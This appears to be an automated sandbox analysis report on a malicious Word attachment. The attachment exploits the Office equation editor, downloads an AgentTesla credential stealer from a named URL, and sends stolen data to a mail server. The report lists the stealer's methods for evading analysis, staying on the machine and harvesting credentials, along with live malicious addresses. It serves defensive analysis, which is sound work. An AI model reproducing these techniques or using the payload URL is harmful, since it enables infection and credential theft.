Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Yara detected AntiVM3
Source: Yara match File source: 00000004.00000002.2097158803.000000000285E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe PID: 2492, type: MEMORY
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe WMI Queries: IWbemServices::CreateInstanceEnum - Win32_BaseBoard
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe WMI Queries: IWbemServices::CreateInstanceEnum - Win32_NetworkAdapterConfiguration
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000004.00000002.2097158803.000000000285E000.00000004.00000001.sdmp Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000004.00000002.2097158803.000000000285E000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLL
Contains functionality to detect virtual machines (SLDT)
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Code function: 7_2_00405174 sldt word ptr [eax] 7_2_00405174
Contains long sleeps (>= 3 min)
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Window / User API: threadDelayed 9416 Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1296 Thread sleep time: -180000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe TID: 2468 Thread sleep time: -103327s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe TID: 2468 Thread sleep time: -40000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe TID: 2744 Thread sleep time: -60000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe TID: 2800 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe TID: 2420 Thread sleep time: -360000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe TID: 2476 Thread sleep time: -9223372036854770s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe TID: 2476 Thread sleep time: -120000s >= -30000s Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2936 Thread sleep time: -120000s >= -30000s Jump to behavior
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Thread delayed: delay time: 103327 Jump to behavior
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Thread delayed: delay time: 40000 Jump to behavior
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Thread delayed: delay time: 30000 Jump to behavior
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000004.00000002.2097158803.000000000285E000.00000004.00000001.sdmp Binary or memory string: vmware
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000004.00000002.2097158803.000000000285E000.00000004.00000001.sdmp Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000004.00000002.2097158803.000000000285E000.00000004.00000001.sdmp Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000004.00000002.2097158803.000000000285E000.00000004.00000001.sdmp Binary or memory string: VMware SVGA II!Add-MpPreference -ExclusionPath "
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000004.00000002.2096028933.000000000020B000.00000004.00000020.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000004.00000002.2097158803.000000000285E000.00000004.00000001.sdmp Binary or memory string: VMWARE
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000004.00000002.2097158803.000000000285E000.00000004.00000001.sdmp Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000004.00000002.2097158803.000000000285E000.00000004.00000001.sdmp Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000004.00000002.2097158803.000000000285E000.00000004.00000001.sdmp Binary or memory string: VMware SVGA II
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000004.00000002.2097158803.000000000285E000.00000004.00000001.sdmp Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging:

barindex
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Code function: 7_2_0040418A LdrInitializeThunk, 7_2_0040418A
Enables debug privileges
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
Injects a PE file into a foreign processes
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Memory written: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe base: 400000 value starts with: 4D5A Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\cAFIUeWyVQPJe' /XML 'C:\Users\user\AppData\Local\Temp\tmpBFD6.tmp' Jump to behavior
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Process created: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Jump to behavior
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2348748827.0000000001420000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2348748827.0000000001420000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2348748827.0000000001420000.00000002.00000001.sdmp Binary or memory string: !Progman

Language, Device and Operating System Detection:

barindex
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Queries volume information: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Queries volume information: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings:

barindex
Adds / modifies Windows certificates
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 Blob Jump to behavior

Stealing of Sensitive Information:

barindex
Yara detected AgentTesla
Source: Yara match File source: 00000004.00000002.2097947633.00000000039FD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2350771035.0000000002BBE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2349110341.0000000002821000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2347727555.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe PID: 1980, type: MEMORY
Source: Yara match File source: Process Memory Space: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe PID: 2492, type: MEMORY
Source: Yara match File source: 7.2.rghbyjuyktyjrthbgvfsfhytrrgfsd.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.rghbyjuyktyjrthbgvfsfhytrrgfsd.exe.3aede88.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.rghbyjuyktyjrthbgvfsfhytrrgfsd.exe.3aede88.4.unpack, type: UNPACKEDPE
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini Jump to behavior
Tries to harvest and steal ftp login credentials
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\ Jump to behavior
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml Jump to behavior
Tries to steal Mail credentials (via file access)
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini Jump to behavior
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: 00000007.00000002.2349110341.0000000002821000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe PID: 1980, type: MEMORY

Remote Access Functionality:

barindex
Yara detected AgentTesla
Source: Yara match File source: 00000004.00000002.2097947633.00000000039FD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2350771035.0000000002BBE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2349110341.0000000002821000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2347727555.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe PID: 1980, type: MEMORY
Source: Yara match File source: Process Memory Space: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe PID: 2492, type: MEMORY
Source: Yara match File source: 7.2.rghbyjuyktyjrthbgvfsfhytrrgfsd.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.rghbyjuyktyjrthbgvfsfhytrrgfsd.exe.3aede88.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.rghbyjuyktyjrthbgvfsfhytrrgfsd.exe.3aede88.4.unpack, type: UNPACKEDPE
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 385437 Sample: RFQ ..doc Startdate: 12/04/2021 Architecture: WINDOWS Score: 100 46 Found malware configuration 2->46 48 Antivirus detection for URL or domain 2->48 50 Sigma detected: Scheduled temp file as task from temp location 2->50 52 9 other signatures 2->52 7 EQNEDT32.EXE 11 2->7         started        12 WINWORD.EXE 336 20 2->12         started        14 EQNEDT32.EXE 2->14         started        process3 dnsIp4 36 rotronics.com.ph 203.167.7.88, 49167, 80 IWEB-ASCA Philippines 7->36 30 C:\...\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, PE32 7->30 dropped 32 C:\Users\user\...\ZhIOjFmINIXbKXm[1].exe, PE32 7->32 dropped 60 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 7->60 16 rghbyjuyktyjrthbgvfsfhytrrgfsd.exe 1 8 7->16         started        file5 signatures6 process7 file8 26 C:\Users\user\AppData\...\cAFIUeWyVQPJe.exe, PE32 16->26 dropped 28 C:\Users\user\AppData\Local\...\tmpBFD6.tmp, XML 16->28 dropped 38 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 16->38 40 Machine Learning detection for dropped file 16->40 42 Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines) 16->42 44 2 other signatures 16->44 20 rghbyjuyktyjrthbgvfsfhytrrgfsd.exe 4 16->20         started        24 schtasks.exe 16->24         started        signatures9 process10 dnsIp11 34 mail.privateemail.com 198.54.122.60, 49168, 49169, 49171 NAMECHEAP-NETUS United States 20->34 54 Tries to steal Mail credentials (via file access) 20->54 56 Tries to harvest and steal ftp login credentials 20->56 58 Tries to harvest and steal browser information (history, passwords, etc) 20->58 signatures12
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
203.167.7.88
 rotronics.com.ph Philippines
32613 IWEB-ASCA true
198.54.122.60
 mail.privateemail.com United States
22612 NAMECHEAP-NETUS false

Contacted Domains

Name IP Active
rotronics.com.ph 203.167.7.88 true
mail.privateemail.com 198.54.122.60 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://rotronics.com.ph/docxxx/dec/ZhIOjFmINIXbKXm.exe true
  • Avira URL Cloud: malware
 unknown